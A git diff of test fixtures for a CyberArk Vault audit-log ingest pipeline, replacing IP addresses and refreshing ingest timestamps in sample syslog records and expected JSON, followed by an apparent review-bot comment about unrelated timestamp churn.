@@ -347,8 +301,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164177600Z", - "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update 
File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"34.66.114.180\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540154900Z", + "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } @@ -360,17 +314,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" 
@@ -390,20 +335,20 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:38Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e106\u003c/MessageID\u003e\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Update File Category", "issuer": "PSMPApp_SSH", "rfc5424": true, "file": "Root\\PSMPApp_SSH.LiveSessions", "safe": "PSMPLiveSessions", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Update File Category", "category": "_PSMLiveSessions_1", "timestamp": "Mar 14 06:49:38", 
@@ -416,8 +361,8 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-06-09T10:24:28.164182400Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:38\",\"IsoTimestamp\":\"2021-03-14T13:49:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Update File 
Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.540163300Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
06:49:38\",\"IsoTimestamp\":\"2021-03-14T13:49:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log index 92fadaab728..2d3df674fa8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log 
@@ -1 +1 @@
-<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}}
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json
index 3a9fc16e78a..0ceb6fe61d6 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json
@@ -28,7 +28,7 @@
 },
 "@timestamp": "2021-03-15T10:22:24.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark"
 },
 "ecs": {
 "version": "1.12.0"
@@ -45,11 +45,11 @@ "reason": "Old Value=[1615803137]", "iso_timestamp": "2021-03-15T10:22:24Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e107\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e107\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Delete File Category", "issuer": "Administrator", "rfc5424": true, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "127.0.0.1", "action": "Delete File Category", 
@@ -64,8 +64,8 @@ "event": { "severity": 2, "action": "delete file category", - "ingested": "2021-06-09T10:24:28.339321900Z", - "original": "\u003c5\u003e1 2021-03-15T10:22:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e107\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:24\",\"IsoTimestamp\":\"2021-03-15T10:22:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"107\",\"Desc\":\"Delete File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"LastFailDate\",\"RequestId\":\"\",\"Reason\":\"Old Value=[1615803137]\",\"ExtraDetails\":\"\",\"Message\":\"Delete File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:37.089518600Z", + "original": "\u003c5\u003e1 2021-03-15T10:22:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e107\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:24\",\"IsoTimestamp\":\"2021-03-15T10:22:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"107\",\"Desc\":\"Delete File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"LastFailDate\",\"RequestId\":\"\",\"Reason\":\"Old Value=[1615803137]\",\"ExtraDetails\":\"\",\"Message\":\"Delete File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "107", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log index b3191445d81..14e3f7ea832 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log 
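Review bot: The `ingested` value in this hunk moves from `2021-06-09T10:24:28.339321900Z` to `2021-12-09T13:36:37.089518600Z` with no relation to the IP substitution the commit is about, which suggests the expected file was regenerated rather than edited and that `event.ingested` is compared verbatim by the pipeline test. If the harness does not already mask it, excluding `event.ingested` from the comparison (or pinning it in the test configuration) would keep future fixture refreshes limited to the lines a change actually concerns. The same unrelated timestamp churn appears in the test-124, test-125 and test-126 expected-file hunks further down.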
